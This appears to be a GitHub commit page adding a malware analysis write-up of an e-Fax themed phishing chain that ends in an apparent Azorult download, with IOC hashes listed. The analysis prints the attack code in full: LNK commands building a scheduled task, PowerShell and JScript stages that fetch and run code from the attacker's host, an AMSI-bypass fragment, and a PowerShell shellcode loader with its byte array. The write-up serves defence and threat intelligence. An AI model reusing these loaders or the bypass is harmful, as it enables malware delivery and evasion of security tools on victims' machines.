Skip to content

Commit

Permalink
added phish2
Browse files Browse the repository at this point in the history
  • Loading branch information
@rmceoin
rmceoin committed Jan 21, 2024
1 parent a8fb793 commit 82fbaed
Show file tree
Hide file tree
Showing 7 changed files with 294 additions and 0 deletions.
3 changes: 3 additions & 0 deletions index.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,9 @@

Documenting reverse engineering of malware.

### Analysing an e-Fax Phishing attempt
[e-Fax Phish Analysis](phish2)

### Analysing a Phishing Javascript
[Phish Analysis](phish1)

Expand Down
Binary file added phish2/images/chasebank-lnk.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added phish2/images/chasebank.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added phish2/images/e-fax-captcha.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added phish2/images/efax-download.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added phish2/images/inside-lnk.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
291 changes: 291 additions & 0 deletions phish2/index.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,291 @@

# e-Fax Phish Analysis

*Posted: 2024-01-21* - [Randy McEoin](https://infosec.exchange/@rmceoin)

Phishing threat actors will engage with your users
in order to persuade them to download and execute
malware.

Here we analyse a phish that our user interacted with
and clicked on the URL provided.
Thankfully our security tools blocked the download.

## The Phish

The initial phish did not contain any URLs or attachments.
Instead they are prompting for a reply.

```
From: 'Peter Armbruster'
X-Original-From: Peter Armbruster <[email protected]>
Reply-To: Peter Armbruster <[email protected]>
To: [email protected]
Date: Thu, 18 Jan 2024 11:02:40 -0800
Subject: Uneasy about an strange charge on my card connected to your online shop - seeking your advice
I am writing to address a strange debit that I've noticed on my credit card, which appears to be linked to a transaction on your e-commerce platform.
This occurrence has caused me unease, especially since I do not recall ever shopping on your site. I've already begun the dispute process with my financial institution. It would be of great help if you could provide any details you have about this transaction, including specifics like the order ID.
I have gathered extensive proofs, such as bank statements, to back up my claim.
Looking forward to your prompt response on this matter.
```

The user replied asking for additional details. To that the phisher
replied with a response that did include a link.

```
From: <[email protected]>
Date: Fri, 19 Jan 2024 11:36:04 -0500 (EST)
Subject: Re: Uneasy about an strange charge on my card connected to your online shop - seeking your advice
To: REDACTED <[email protected]>
Hello,
This is a follow-up regarding an unrecognized charge on my credit card, which seems to have originated from your business.
I am attaching my bank statement that identifies the disputed charge. I am sure that this transaction is incorrect as it was never authorized by me.
I kindly ask for your help in working with my bank to quickly resolve and reverse this charge.
Your prompt response to this matter is highly valued. Please reach out if there's any additional information you require from me.
Thank you for your understanding and cooperation.
This document has been sent by e-Fax®:
hXXps://docs2.e-fax[.]org/file_download/20053234343365/eFax_statement_Jan_2024.pdf
```

While the user did click on the link, it was blocked by one
of our security layers.

To better understand what was at risk, I took that URL and
opened it up in a browser running in a sandbox. Let's check it out.

## Fake eFax

The domain for the URL is perhaps meant to sound like
the legitimate efax.com. It however is a domain controlled
by the threat actor. The first thing it does is
use Google's recaptcha to present an air of realism.

![browser showing e-fax captcha](images/e-fax-captcha.png)

After solving the recaptcha, a ZIP file is downloaded.

![browser showing a file was downloaded](images/efax-download.png)

The file downloaded was `efax_statement_jan_2024.zip`.

## ZIP file

Opening the ZIP file from the browser would show another
file for the user to open.

![Windows Explorer opening the ZIP file](images/chasebank.png)

## LNK file

To analyse the LNK inside the ZIP, let's switch a linux prompt.
Start by using `unzip` to get at the LNK file. Then I tend to
find the rudimentary `cat` effective enough to discover what's
happening.

![bash prompt showing an unzip and cat](images/chasebank-lnk.png)

In the middle of that we can see the meat of what it's going to do.

![malicious code inside the LNK file](images/inside-lnk.png)

Breaking that down we see three commands it will run in CMD.

```
echo c3RhcnQgL21pbiBwb3dlcnNoZWxsIC1jb21tYW5kICJJV1IgJ2h0dHBzOi8vbnJndGlrLm14L3dwLWNvbnRlbnQvdXBsb2Fkcy93cC1jb250ZW50LnBocCcgLU91dEZpbGUgJyV0ZW1wJVxoeDlSUDNCVi5qcyc7IHNjaHRhc2tzIC9kZWxldGUgL2YgL3RuIGN5SmFTWm91S2k7IHdzY3JpcHQgJXRlbXAlXGh4OVJQM0JWLmpzIg== > nJ7wdTLi.bat &
certutil -f -decode nJ7wdTLi.bat nJ7wdTLi.bat &
schtasks /create /f /sc minute /mo 1 /tn cyJaSZouKi /tr "%temp%\nJ7wdTLi.bat"
```

`echo` will create the file `nJ7wdTLi.bat` with base64 text in it.

`certutil` will convert that to the following.

```batch
start /min powershell -command "IWR 'https://nrgtik.mx/wp-content/uploads/wp-content.php' -OutFile '%temp%\hx9RP3BV.js'; schtasks /delete /f /tn cyJaSZouKi; wscript %temp%\hx9RP3BV.js"
```

Finally `schtasks` will run the batch file every minute.

## Initial Task

The scheduled task named `cyJaSZouKi` will use Powershell to download
the next stage from `nrgtik[.]mx/wp-content/uploads/wp-content.php`,
delete the scheduled task, then finally use `wscript.exe` to execute
the downloaded Windows Javascript file `%temp%\hx9RP3BV.js`.

## Stage 2

The stage 2 payload is lightly obfuscated, but straightforward
enough to simply read.

```javascript
var f1="Scr",f2="ing.Fi",f3="stemOb"
var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject");
var w1="WSc",w2="riPt",w4="eLl"
var wsh=w1+w2+".sH"+w4
var bbj=new ActiveXObject(wsh)
var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth==64?"SysWOW64":"System32"
var rd=bbj.ExpandEnvironmentStrings("%SYSTEMROOT%")+"\\"+fldr+"\\WindowsPowerShell\\v1.0\\powershell.exe"
if (WScript.ScriptName != "agent.js") {
var fs5="yFi"
fso["Cop"+fs5+"le"](WScript.ScriptFullName, bbj.ExpandEnvironmentStrings("%programdata%")+"\\agent.js");
}
var mtx_name="7zQ5CMQN25L4";
var mtx_file = bbj.ExpandEnvironmentStrings("%temp%")+"\\"+mtx_name;
var fs1="leteFi"
var fs2="leExis"
try {
fso["De"+fs1+"le"](mtx_file);
} catch (e) {}
if (!fso["Fi"+fs2+"ts"](mtx_file))
{
bbj.Run(rd+" -command \"$env:paths = '" + mtx_name + "'; IEX(IWR -UseBasicParsing 'https://nrgtik.mx/wp-content/uploads/agent1.ps1'); $f.SetValue($null, $true); IEX(IWR -UseBasicParsing 'https://nrgtik.mx/wp-content/uploads/agent3.ps1')\"", 0)
}
```

Ultimately its purpose is to download and execute two more payloads.

## agent1.ps1

Next a Powershell script is downloaded from here and run.

```
hXXps://nrgtik[.]mx/wp-content/uploads/agent1.ps1
```

```powershell
$a=[Ref].Assembly.GetTypes();
Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};
$d=$c.GetFields("NonPublic,Static");
Foreach($e in $d) {if ($e.Name -like "*Failed") {$f=$e}};
```

Unsure what this is meant to do.

## agent3.ps1

Next another Powershell script is downloaded from here and run.

```
hXXps://nrgtik[.]mx/wp-content/uploads/agent3.ps1
```

```powershell
[Byte[]]$image = (IWR -UseBasicParsing 'https://nrgtik.mx/wp-content/uploads/helper1.exe').Content;
function GDT
{
Param
(
[OutputType([Type])]
[Parameter( Position = 0)]
[Type[]]
$Parameters = (New-Object Type[](0)),
[Parameter( Position = 1 )]
[Type]
$ReturnType = [Void]
)
$DA = New-Object System.Reflection.AssemblyName('RD')
$AB = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DA, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$MB = $AB.DefineDynamicModule('IMM', $false)
$TB = $MB.DefineType('MDT', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$CB = $TB.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
$CB.SetImplementationFlags('Runtime, Managed')
$MB = $TB.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
$MB.SetImplementationFlags('Runtime, Managed')
Write-Output $TB.CreateType()
}
function GPA
{
Param
(
[OutputType([IntPtr])]
[Parameter( Position = 0, Mandatory = $True )]
[String]
$Module,
[Parameter( Position = 1, Mandatory = $True )]
[String]
$Procedure
)
$SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null)
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
$HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
}
$marshal = [System.Runtime.InteropServices.Marshal]
[Byte[]]$sc = 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x56, 0x57, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x40, 0x0C, 0x8B, 0x00, 0x8B, 0x00, 0x8B, 0x40, 0x18, 0x89, 0x45, 0xF8, 0x8B, 0x75, 0xF8, 0xBA, 0xF1, 0xF0, 0xAD, 0x0A, 0x8B, 0xCE, 0xE8, 0xD2, 0x01, 0x00, 0x00, 0xBA, 0x03, 0x1D, 0x3C, 0x0B, 0x89, 0x45, 0xF0, 0x8B, 0xCE, 0xE8, 0xC3, 0x01, 0x00, 0x00, 0xBA, 0xE3, 0xCA, 0xD8, 0x03, 0x89, 0x45, 0xEC, 0x8B, 0xCE, 0xE8, 0xB4, 0x01, 0x00, 0x00, 0x8B, 0xD8, 0x8B, 0x45, 0x08, 0x6A, 0x40, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8B, 0x70, 0x3C, 0x03, 0xF0, 0x89, 0x75, 0xFC, 0xFF, 0x76, 0x50, 0xFF, 0x76, 0x34, 0xFF, 0xD3, 0x8B, 0xF8, 0x85, 0xFF, 0x75, 0x17, 0x6A, 0x40, 0x68, 0x00, 0x30, 0x00, 0x00, 0xFF, 0x76, 0x50, 0x50, 0xFF, 0xD3, 0x8B, 0xF8, 0x85, 0xFF, 0x0F, 0x84, 0x66, 0x01, 0x00, 0x00, 0x8B, 0x56, 0x54, 0x85, 0xD2, 0x74, 0x18, 0x8B, 0x75, 0x08, 0x8B, 0xCF, 0x2B, 0xF7, 0x8A, 0x04, 0x0E, 0x8D, 0x49, 0x01, 0x88, 0x41, 0xFF, 0x83, 0xEA, 0x01, 0x75, 0xF2, 0x8B, 0x75, 0xFC, 0x0F, 0xB7, 0x4E, 0x14, 0x33, 0xC0, 0x03, 0xCE, 0x33, 0xDB, 0x89, 0x4D, 0xF4, 0x66, 0x3B, 0x46, 0x06, 0x73, 0x44, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0xB7, 0xC3, 0x8D, 0x04, 0x80, 0x8B, 0x54, 0xC1, 0x28, 0x8B, 0x74, 0xC1, 0x2C, 0x8B, 0x4C, 0xC1, 0x24, 0x03, 0x75, 0x08, 0x03, 0xCF, 0x85, 0xD2, 0x74, 0x13, 0x2B, 0xF1, 0x0F, 0x1F, 0x00, 0x8A, 0x04, 0x0E, 0x8D, 0x49, 0x01, 0x88, 0x41, 0xFF, 0x83, 0xEA, 0x01, 0x75, 0xF2, 0x8B, 0x75, 0xFC, 0x43, 0x8B, 0x4D, 0xF4, 0x66, 0x3B, 0x5E, 0x06, 0x72, 0xC5, 0x8B, 0x86, 0x80, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x76, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x14, 0x72, 0x6D, 0x83, 0x7C, 0x38, 0x0C, 0x00, 0x8D, 0x1C, 0x38, 0x89, 0x5D, 0x08, 0x74, 0x60, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x8B, 0x43, 0x0C, 0x03, 0xC7, 0x50, 0xFF, 0x55, 0xF0, 0x8B, 0xD0, 0x89, 0x55, 0xF4, 0x85, 0xD2, 0x74, 0x3A, 0x8B, 0x73, 0x10, 0x8B, 0x0B, 0x85, 0xC9, 0x8D, 0x1C, 0x3E, 0x0F, 0x45, 0xF1, 0x03, 0xF7, 0x8B, 0x06, 0x85, 0xC0, 0x74, 0x22, 0x79, 0x05, 0x0F, 0xB7, 0xC0, 0xEB, 0x05, 0x83, 0xC0, 0x02, 0x03, 0xC7, 0x50, 0x52, 0xFF, 0x55, 0xEC, 0x8B, 0x55, 0xF4, 0x83, 0xC6, 0x04, 0x89, 0x03, 0x83, 0xC3, 0x04, 0x8B, 0x06, 0x85, 0xC0, 0x75, 0xDE, 0x8B, 0x5D, 0x08, 0x83, 0xC3, 0x14, 0x89, 0x5D, 0x08, 0x83, 0x7B, 0x0C, 0x00, 0x75, 0xA8, 0x8B, 0x75, 0xFC, 0x8B, 0xDF, 0x2B, 0x5E, 0x34, 0x83, 0xBE, 0xA4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x52, 0x8B, 0x86, 0xA0, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x48, 0x83, 0x3C, 0x38, 0x00, 0x8D, 0x14, 0x38, 0x74, 0x3F, 0x0F, 0x1F, 0x40, 0x00, 0x8B, 0x72, 0x04, 0x8D, 0x42, 0x04, 0x83, 0xEE, 0x08, 0x89, 0x45, 0x08, 0xD1, 0xEE, 0xB9, 0x00, 0x00, 0x00, 0x00, 0x74, 0x1C, 0x0F, 0xB7, 0x44, 0x4A, 0x08, 0x66, 0x85, 0xC0, 0x74, 0x0A, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x03, 0x02, 0x01, 0x1C, 0x38, 0x41, 0x3B, 0xCE, 0x72, 0xE7, 0x8B, 0x45, 0x08, 0x03, 0x10, 0x83, 0x3A, 0x00, 0x75, 0xC8, 0x8B, 0x75, 0xFC, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x89, 0x78, 0x08, 0x8B, 0x46, 0x28, 0x03, 0xC7, 0xFF, 0xD0, 0x5F, 0x5E, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF8, 0x56, 0x57, 0x33, 0xFF, 0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x48, 0x1C, 0x8B, 0x50, 0x24, 0x03, 0xCB, 0x03, 0xD3, 0x89, 0x4D, 0xEC, 0x8B, 0x48, 0x20, 0x03, 0xCB, 0x89, 0x55, 0xF0, 0x8B, 0x50, 0x18, 0x89, 0x4D, 0xF4, 0x89, 0x55, 0xFC, 0x85, 0xD2, 0x74, 0x4B, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x8B, 0x34, 0xB9, 0x03, 0xF3, 0x74, 0x3A, 0x8A, 0x0E, 0x33, 0xC0, 0x84, 0xC9, 0x74, 0x2A, 0x90, 0xC1, 0xE0, 0x04, 0x8D, 0x76, 0x01, 0x0F, 0xBE, 0xC9, 0x03, 0xC1, 0x8B, 0xD0, 0x81, 0xE2, 0x00, 0x00, 0x00, 0xF0, 0x74, 0x07, 0x8B, 0xCA, 0xC1, 0xE9, 0x18, 0x33, 0xC1, 0x8A, 0x0E, 0xF7, 0xD2, 0x23, 0xC2, 0x84, 0xC9, 0x75, 0xDA, 0x8B, 0x55, 0xFC, 0x3B, 0x45, 0xF8, 0x74, 0x11, 0x8B, 0x4D, 0xF4, 0x47, 0x3B, 0xFA, 0x72, 0xBA, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45, 0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC
$VAAddr = GPA kernel32.dll VirtualAlloc
$VADeleg = GDT @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])
$VA = $marshal::GetDelegateForFunctionPointer($VAAddr, $VADeleg)
$CTAddr = GPA kernel32.dll CreateThread
$CTDeleg = GDT @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
$CT = $marshal::GetDelegateForFunctionPointer($CTAddr, $CTDeleg)
$WFSOAddr = GPA kernel32.dll WaitForSingleObject
$WFSODeleg = GDT @([IntPtr], [Int32]) ([Int])
$WFSO = $marshal::GetDelegateForFunctionPointer($WFSOAddr, $WFSODeleg)
$x=$VA.Invoke(0,$sc.Length, 0x3000, 0x40)
$marshal::Copy($sc, 0, $x, $sc.Length);
$imageBuf = $marshal::AllocHGlobal($image.Length)
$marshal::Copy($image, 0, $imageBuf, $image.Length);
$thread = $CT.Invoke(0,0,$x,$imageBuf,0,0);
$WFSO.Invoke($thread, -1);
```

We can tell it's going to fetch and run an EXE.

```
hXXps://nrgtik[.]mx/wp-content/uploads/helper1.exe
```

## The EXE

Not entirely sure what `helper1.exe` does. It can't be good.

In [MalwarBazaar](https://bazaar.abuse.ch/sample/e3a406607f9de0b40935b0838b40f60dee58f63e69490f7dd9320d0e3293153c/)
the sample is labeled with Azorult by a few engines.

## IOCs

```
dd4612be6e9a57ea8b9ac95cfc1db5bf7b4b05b3ac837c582cddbd7f1e7aed93 efax_statement_jan_2024.zip
9b1a84b656f463c30a9e69bdd88c8e268354b3b3eccdd72725779517c016e464 chasebank_statement_Jan_2024.lnk
2fc9c32a7a88ad193cf3d24d25a93ddec1f20141a2d50fd68f5c77115abff5e8 hx9RP3BV.js
ace2a7812874a84b32590f440f9c4d9d99567e12cb86f0ba598e5e65aa4948c0 agent1.ps1
f61e953b18744be06991184c5d58a618ebcdb53c4a64ed0236e9e9300eb2aacf agent3.ps1
e3a406607f9de0b40935b0838b40f60dee58f63e69490f7dd9320d0e3293153c helper1.exe
```

0 comments on commit 82fbaed

Please sign in to comment.